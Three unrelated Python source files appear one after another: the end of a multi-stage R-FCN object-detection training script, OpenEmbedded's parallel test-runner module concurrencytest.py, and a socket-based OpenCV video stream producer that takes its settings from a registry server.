solvers = [[net_name, model_name, 'stage1_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage2_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage3_rpn_solver360k480k.pt']]
solvers = [os.path.join('.', 'models', 'coco', *s) for s in solvers]
# Iterations for each training stage
max_iters = [480000, 480000, 480000, 480000, 480000]
else:
solvers = [[net_name, model_name, 'stage1_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage2_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage3_rpn_solver60k80k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 120000, 80000, 120000, 80000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, model_name, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, output_cache=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rpn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = 6000 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 300 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
# Generate proposals on the imdb
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
if not os.path.exists(rpn_proposals_path):
rpn_proposals = imdb_proposals(rpn_net, imdb)
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
queue.put({'proposal_path': rpn_proposals_path})
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
def train_rfcn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_cache=None):
"""Train a R-FCN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train R-FCN
# Send R-FCN model path over the multiprocessing queue
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rfcn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rfcn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_compute_stats(queue=None, imdb_name=None, cfg=None, rpn_test_prototxt=None):
"""Compute mean stds for anchors
"""
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
roidb, imdb = get_roidb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
mean_file = os.path.join(imdb.cache_path, imdb.name + '_means.npy')
std_file = os.path.join(imdb.cache_path, imdb.name + '_stds.npy')
if os.path.exists(mean_file) and os.path.exists(std_file):
means = np.load(mean_file)
stds = np.load(std_file)
else:
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, caffe.TEST)
# Generate proposals on the imdb
print 'start computing means/stds, it may take several minutes...'
if imdb_name.startswith('coco'):
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(4, 8, 16, 32))
else:
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(8, 16, 32))
np.save(mean_file, means)
np.save(std_file, stds)
queue.put({'means': means, 'stds': stds})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.imdb_name, args.net_name, args.model_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 0 RPN, compute normalization means and stds'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_compute_stats, kwargs=mp_kwargs)
p.start()
stage0_anchor_stats = mp_queue.get()
p.join()
cfg.TRAIN.RPN_NORMALIZE_MEANS = stage0_anchor_stats['means']
cfg.TRAIN.RPN_NORMALIZE_STDS = stage0_anchor_stats['stds']
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg,
output_cache='stage1_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 R-FCN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'],
output_cache='stage1_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage1 R-FCN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg,
output_cache='stage2_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 R-FCN using Stage-2 RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'],
output_cache='stage2_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 3 RPN, init from stage1 R-FCN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage3'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage2_out['model_path']),
solver=solvers[4],
max_iters=max_iters[4],
cfg=cfg,
output_cache='stage3_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage3_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 3 RPN, generate test proposals only'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage3_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage3_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print 'Final model: {}'.format(str(rfcn_stage2_out['model_path']))
print 'Final RPN: {}'.format(str(rpn_stage3_out['test_proposal_path']))
|
concurrencytest.py
|
#!/usr/bin/env python3
#
# Modified for use in OE by Richard Purdie, 2018
#
# Modified by: Corey Goldberg, 2013
# License: GPLv2+
#
# Original code from:
# Bazaar (bzrlib.tests.__init__.py, v2.6, copied Jun 01 2013)
# Copyright (C) 2005-2011 Canonical Ltd
# License: GPLv2+
import os
import sys
import traceback
import unittest
import subprocess
import testtools
import threading
import time
import io
from queue import Queue
from itertools import cycle
from subunit import ProtocolTestCase, TestProtocolClient
from subunit.test_results import AutoTimingTestResultDecorator
from testtools import ThreadsafeForwardingResult, iterate_tests
import bb.utils
import oe.path
_all__ = [
'ConcurrentTestSuite',
'fork_for_tests',
'partition_tests',
]
#
# Patch the version from testtools to allow access to _test_start and allow
# computation of timing information and threading progress
#
class BBThreadsafeForwardingResult(ThreadsafeForwardingResult):
def __init__(self, target, semaphore, threadnum, totalinprocess, totaltests):
super(BBThreadsafeForwardingResult, self).__init__(target, semaphore)
self.threadnum = threadnum
self.totalinprocess = totalinprocess
self.totaltests = totaltests
def _add_result_with_semaphore(self, method, test, *args, **kwargs):
self.semaphore.acquire()
try:
self.result.starttime[test.id()] = self._test_start.timestamp()
self.result.threadprogress[self.threadnum].append(test.id())
totalprogress = sum(len(x) for x in self.result.threadprogress.values())
self.result.progressinfo[test.id()] = "%s: %s/%s %s/%s (%ss) (%s)" % (
self.threadnum,
len(self.result.threadprogress[self.threadnum]),
self.totalinprocess,
totalprogress,
self.totaltests,
"{0:.2f}".format(time.time()-self._test_start.timestamp()),
test.id())
finally:
self.semaphore.release()
super(BBThreadsafeForwardingResult, self)._add_result_with_semaphore(method, test, *args, **kwargs)
#
# A dummy structure to add to io.StringIO so that the .buffer object
# is available and accepts writes. This allows unittest with buffer=True
# to interact ok with subunit which wants to access sys.stdout.buffer.
#
class dummybuf(object):
def __init__(self, parent):
self.p = parent
def write(self, data):
self.p.write(data.decode("utf-8"))
#
# Taken from testtools.ConncurrencyTestSuite but modified for OE use
#
class ConcurrentTestSuite(unittest.TestSuite):
def __init__(self, suite, processes):
super(ConcurrentTestSuite, self).__init__([suite])
self.processes = processes
def run(self, result):
tests, totaltests = fork_for_tests(self.processes, self)
try:
threads = {}
queue = Queue()
semaphore = threading.Semaphore(1)
result.threadprogress = {}
for i, (test, testnum) in enumerate(tests):
result.threadprogress[i] = []
process_result = BBThreadsafeForwardingResult(result, semaphore, i, testnum, totaltests)
# Force buffering of stdout/stderr so the console doesn't get corrupted by test output
# as per default in parent code
process_result.buffer = True
# We have to add a buffer object to stdout to keep subunit happy
process_result._stderr_buffer = io.StringIO()
process_result._stderr_buffer.buffer = dummybuf(process_result._stderr_buffer)
process_result._stdout_buffer = io.StringIO()
process_result._stdout_buffer.buffer = dummybuf(process_result._stdout_buffer)
reader_thread = threading.Thread(
target=self._run_test, args=(test, process_result, queue))
threads[test] = reader_thread, process_result
reader_thread.start()
while threads:
finished_test = queue.get()
threads[finished_test][0].join()
del threads[finished_test]
except:
for thread, process_result in threads.values():
process_result.stop()
raise
finally:
for test in tests:
test[0]._stream.close()
def _run_test(self, test, process_result, queue):
try:
try:
test.run(process_result)
except Exception:
# The run logic itself failed
case = testtools.ErrorHolder(
"broken-runner",
error=sys.exc_info())
case.run(process_result)
finally:
queue.put(test)
def removebuilddir(d):
delay = 5
while delay and os.path.exists(d + "/bitbake.lock"):
time.sleep(1)
delay = delay - 1
bb.utils.prunedir(d)
def fork_for_tests(concurrency_num, suite):
result = []
test_blocks = partition_tests(suite, concurrency_num)
# Clear the tests from the original suite so it doesn't keep them alive
suite._tests[:] = []
totaltests = sum(len(x) for x in test_blocks)
for process_tests in test_blocks:
numtests = len(process_tests)
process_suite = unittest.TestSuite(process_tests)
# Also clear each split list so new suite has only reference
process_tests[:] = []
c2pread, c2pwrite = os.pipe()
# Clear buffers before fork to avoid duplicate output
sys.stdout.flush()
sys.stderr.flush()
pid = os.fork()
if pid == 0:
ourpid = os.getpid()
try:
newbuilddir = None
stream = os.fdopen(c2pwrite, 'wb', 1)
os.close(c2pread)
# Create a new separate BUILDDIR for each group of tests
if 'BUILDDIR' in os.environ:
builddir = os.environ['BUILDDIR']
newbuilddir = builddir + "-st-" + str(ourpid)
selftestdir = os.path.abspath(builddir + "/../meta-selftest")
newselftestdir = newbuilddir + "/meta-selftest"
bb.utils.mkdirhier(newbuilddir)
oe.path.copytree(builddir + "/conf", newbuilddir + "/conf")
oe.path.copytree(builddir + "/cache", newbuilddir + "/cache")
oe.path.copytree(selftestdir, newselftestdir)
for e in os.environ:
if builddir in os.environ[e]:
os.environ[e] = os.environ[e].replace(builddir, newbuilddir)
subprocess.check_output("git init; git add *; git commit -a -m 'initial'", cwd=newselftestdir, shell=True)
# Tried to used bitbake-layers add/remove but it requires recipe parsing and hence is too slow
subprocess.check_output("sed %s/conf/bblayers.conf -i -e 's#%s#%s#g'" % (newbuilddir, selftestdir, newselftestdir), cwd=newbuilddir, shell=True)
os.chdir(newbuilddir)
for t in process_suite:
if not hasattr(t, "tc"):
continue
cp = t.tc.config_paths
for p in cp:
if selftestdir in cp[p] and newselftestdir not in cp[p]:
cp[p] = cp[p].replace(selftestdir, newselftestdir)
if builddir in cp[p] and newbuilddir not in cp[p]:
cp[p] = cp[p].replace(builddir, newbuilddir)
# Leave stderr and stdout open so we can see test noise
# Close stdin so that the child goes away if it decides to
# read from stdin (otherwise its a roulette to see what
# child actually gets keystrokes for pdb etc).
newsi = os.open(os.devnull, os.O_RDWR)
os.dup2(newsi, sys.stdin.fileno())
subunit_client = TestProtocolClient(stream)
# Force buffering of stdout/stderr so the console doesn't get corrupted by test output
# as per default in parent code
subunit_client.buffer = True
subunit_result = AutoTimingTestResultDecorator(subunit_client)
process_suite.run(subunit_result)
if ourpid != os.getpid():
os._exit(0)
if newbuilddir:
removebuilddir(newbuilddir)
except:
# Don't do anything with process children
if ourpid != os.getpid():
os._exit(1)
# Try and report traceback on stream, but exit with error
# even if stream couldn't be created or something else
# goes wrong. The traceback is formatted to a string and
# written in one go to avoid interleaving lines from
# multiple failing children.
try:
stream.write(traceback.format_exc().encode('utf-8'))
except:
sys.stderr.write(traceback.format_exc())
finally:
if newbuilddir:
removebuilddir(newbuilddir)
stream.flush()
os._exit(1)
stream.flush()
os._exit(0)
else:
os.close(c2pwrite)
stream = os.fdopen(c2pread, 'rb', 1)
test = ProtocolTestCase(stream)
result.append((test, numtests))
return result, totaltests
def partition_tests(suite, count):
# Keep tests from the same class together but allow tests from modules
# to go to different processes to aid parallelisation.
modules = {}
for test in iterate_tests(suite):
m = test.__module__ + "." + test.__class__.__name__
if m not in modules:
modules[m] = []
modules[m].append(test)
# Simply divide the test blocks between the available processes
partitions = [list() for _ in range(count)]
for partition, m in zip(cycle(partitions), modules):
partition.extend(modules[m])
# No point in empty threads so drop them
return [p for p in partitions if p]
|
adaptiveStreamProducer.py
|
import cv2,imutils, socket
import time
import threading
import time
import uuid
import logging, os
from functools import partial
from numpy import double
import requests
import json
import sys
import configparser
####### CONFIG PARAMS
#CONFIGSERVERIP = '127.0.0.1'
#CONFIGSERVERPORT = 9997
#logging.basicConfig(filename='adaptiveStreamserver.log', format='%(asctime)s %(levelname)-8s %(message)s',encoding='utf-8', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S')
logging.basicConfig(handlers=[logging.FileHandler(filename='adaptiveStreamserver.log', encoding='utf-8', mode='a+')], format='%(asctime)s %(levelname)-8s %(message)s', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S')
######################
p1y = 5
p1x = 5
p2y = 405
p2x = 405
desiredfps = 10
originalfps = 0
imagebuffer = bytes()
configDict = {}
firstStart = True
######################
##### REMOVE ######
def readCLI(s):
while s != True:
cmd = input("Please enter Command: ")
print("You entered: " + cmd)
if cmd == 'add':
host = input("enter Client HOST (e.g.: 192.168.100.1:1234): ")
client = host.split(':')
if (len(client) != 2):
print("invalid client syntax")
continue
global clients
clients.append(host)
CID = str(client[0])+":"+str(client[1])
print("CID: ", CID)
global configDict
#create default config
configDict[CID+"fps"] = 30
configDict[CID+"p1x"] = 0
configDict[CID+"p1y"] = 0
configDict[CID+"p2x"] = 0
configDict[CID+"p2y"] = 0
#CID = uuid.uuid4()
#logging.debug(CID)
thread = threading.Thread(target=worker, args=(stop,client[0], client[1],CID,))
threads.append(thread)
thread.start()
else:
print("#######################################\n HELP\n Supported Commands: \n add: add new client")
def capture(stopthread, name, camid, headless):
if camid < 0:
vid = cv2.VideoCapture("test2.mp4")
else:
vid = cv2.VideoCapture(camid) # replace 'rocket.mp4' with 0 for webcam
#vid.set(cv2.CAP_PROP_FRAME_WIDTH, 4000)
#vid.set(cv2.CAP_PROP_FRAME_HEIGHT, 3000)
fps,st,frames_to_count,cnt = (0,0,20,0)
windowname = 'BUFFERED VIDEO'+name
while True:
while(vid.isOpened()):
#continue
_,frame = vid.read()
#frame = frame[p1y:p2y,p1x:p2x]
#frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#print("dtype: ",frame.dtype)
logging.debug(frame.shape)
#cv2.imshow('INPUT_ORIG',frame)
logging.debug(' buffer: '+ str(len(bytes(frame))))
global originalfps
global imagebuffer
bufferlock.acquire()
imagebuffer = frame
bufferlock.release()
#frame = cv2.putText(frame,'FPS: '+str(fps),(10,40),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)
if headless == False:
cv2.imshow(windowname,frame)
key = cv2.waitKey(1) & 0xFF
#if key == ord('q'):
# server_socket.close()
# break
if cnt == frames_to_count:
try:
fps = round(frames_to_count/(time.time()-st))
if originalfps == 0:
originalfps = fps
st=time.time()
cnt=0
except:
pass
cnt+=1
def worker(s,host_ip,port, cid):
BUFF_SIZE = 65536
port = int(port)
CID = cid #host_ip+":"+str(port)
print("CID in worker: ", CID)
s = socket.socket()
s.connect((host_ip, port))
class writeproc(threading.Thread):
def __init__(self, server, CID):
threading.Thread.__init__(self)
self.server = server
self.CID = CID
def run(self):
recieved = 0
while True:
global configDict
if configDict[self.CID+"terminate"] == True:
raise Exception("Got Termination Request")
if configDict[self.CID+"mode"] == "single" and configDict[self.CID+"stop"] == False:
configDict[self.CID+"stop"] = True
global imagebuffer
global distabcebuffer
if len(imagebuffer) == 0:
time.sleep(0.1)
continue
b = time.time()
x = recieved
message = imagebuffer
if 0 != configDict[self.CID+"p1x"] + configDict[self.CID+"p1y"] + configDict[self.CID+"p2x"] + configDict[self.CID+"p2y"]:
message = message[configDict[self.CID+"p1y"]:configDict[self.CID+"p2y"],configDict[self.CID+"p1x"]:configDict[self.CID+"p2x"]]
messagelen = str("%020d"%len(message))
if message.size > 0:
encoded,buffer = cv2.imencode('.jpg',message,[cv2.IMWRITE_JPEG_QUALITY,80])
lenlen = int(len(buffer))
s = "00000000"
blen = str(len(buffer))
#buf = s[:len(blen)-1]+blen
preamble = bytes(str("AB01")+blen.zfill(10), 'utf-8')
#print("buf: ", int(len(buffer)))
#print(type(buffer))
#print(type(buffer.shape))
#print(type(buffer.ndim))
#print(type(buffer.dtype))
#print(type(preamble))
#print(len(preamble))
self.server.send(preamble+buffer.tobytes())
#time.sleep(200)
key = cv2.waitKey(1) & 0xFF
#time.sleep(0.1)
#self.server.send(bytes((messagelen+message), "utf_8"))
lock.acquire()
recieved += 1
lock.release()
#if message == "BYE!":
# final.set()
# break
a = time.time()
sleep_dur = 1/configDict[self.CID+"fps"]-(a-b)
#print("sleeping ",sleep_dur)
while configDict[self.CID+"stop"] == True:
time.sleep(0.05)
if configDict[self.CID+"terminate"] == True:
raise Exception("Got Termination Request")
sleep_dur = 0 # no need to wait anymore
if sleep_dur < 0:
#print("have to speed up")
continue
#print("duration:",a-b, " add sleeping ",sleep_dur)
time.sleep(sleep_dur)
class readproc(threading.Thread):
def __init__(self, server, CID):
threading.Thread.__init__(self)
self.server = server
self.CID = CID
def run(self):
global recieved
while True:
global configDict
if configDict[self.CID+"terminate"] == True:
raise Exception("Got Termination Request")
recieved = 0
x = recieved
if final.is_set():
break
mlen = int(str(self.server.recv(20), 'utf_8'))
response = str(self.server.recv(mlen), 'utf_8')
lock.acquire()
recieved += 1
lock.release()
logging.info(response)
lElem = response.split(",")
command = lElem[0]
#logging.info("Command: "+ command)
if command == 'init':
# make a random UUID
logging.info("do reinit")
#CID = uuid.uuid4()
if command == 'update':
logging.debug("execute update")
configDict[self.CID+"fps"] = int(lElem[1])
configDict[self.CID+"p1x"] = int(lElem[2])
configDict[self.CID+"p1y"] = int(lElem[3])
configDict[self.CID+"p2x"] = int(lElem[4])
configDict[self.CID+"p2y"] = int(lElem[5])
continue
if command == 'stop':
continue
# print("---------------", recieved)
recieved = 0
for i in range(5):
time.sleep(0.1)
#try:
final = threading.Event()
lock = threading.Lock()
cwrite = writeproc(s,CID)
cread = readproc(s,CID)
cwrite.start()
cread.setDaemon(True)
cread.start()
cwrite.join()
s.close()
#except:
# print("worker terminated!")
def callRegistry(name):
#register ourself
global firstStart
if firstStart == True:
x = requests.post('http://'+CONFIGSERVERIP+':'+str(CONFIGSERVERRESTPORT)+'/addProducer', json={'prodname': name})
print(x.status_code)
firstStart = False
if x.ok != True:
return x.ok
#get consumers
x = requests.post('http://'+CONFIGSERVERIP+':'+str(CONFIGSERVERRESTPORT)+'/getConsumers', json={'prodname': name})
json_data = json.loads(x.text)
print(len(json_data))
type(json_data)
for val in json_data:
print(val)
print((json_data[val]["host"]))
global clients
host = json_data[val]["consname"]
CID = host
if CID not in clients:
print("new consumer ... add")
clients.append(host)
print("CID: ", CID)
global configDict
configDict[CID+"fps"] = json_data[val]["fps"]
configDict[CID+"p1x"] = json_data[val]["p1x"]
configDict[CID+"p1y"] = json_data[val]["p1y"]
configDict[CID+"p2x"] = json_data[val]["p2x"]
configDict[CID+"p2y"] = json_data[val]["p2y"]
configDict[CID+"mode"] = json_data[val]["mode"]
configDict[CID+"stop"] = json_data[val]["stop"]
configDict[CID+"terminate"] = False
if configDict[CID+"mode"] == "single" and configDict[CID+"stop"] == False:
configDict[CID+"stop"] = True
elif configDict[CID+"mode"] != "single":
configDict[CID+"stop"] = False
thread = threading.Thread(target=worker, args=(stop,json_data[val]["host"], json_data[val]["port"],CID,))
#configDict[CID+"tid"] = json_data[val]["stop"]
threads.append(thread)
thread.start()
else:
print("known consumer ... skip")
def configThread(stopMainApp, name):
while True:
try:
logging.debug("start config thread ")
INCONFsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
INCONFsock.connect((CONFIGSERVERIP, CONFIGSERVERPORT))
INCONFsock.send(bytes("Hallo Registry ,"+name+", ", 'utf-8'))
while True:
global clients
command = ''
# TODO check if we still need to do this
if len(clients) > 0:
print("New clients: ",str(len(clients)))
#newClient = clients.pop(0)
command = 'init'
buf = INCONFsock.recv(1024)
logging.debug(">>> Config REQUEST: "+str(buf,'utf-8'))
print(">>> Config REQUEST: "+str(buf,'utf-8'))
s = buf.decode("utf-8")
lElem = s.split(",")
command = lElem[0]
logging.debug("Command: "+ command)
print(lElem)
if command == 'init':
# make a random UUID
print("do init")
if command == 'update':
print("do update")
CID = (lElem[7])
if CID in clients:
if configDict[CID+"terminate"] == True: #remove client from previous iteration
clients.remove(CID)
if CID not in clients:
print("potential NEW consumer!")
callRegistry(name)
else:
print("update existing consumer")
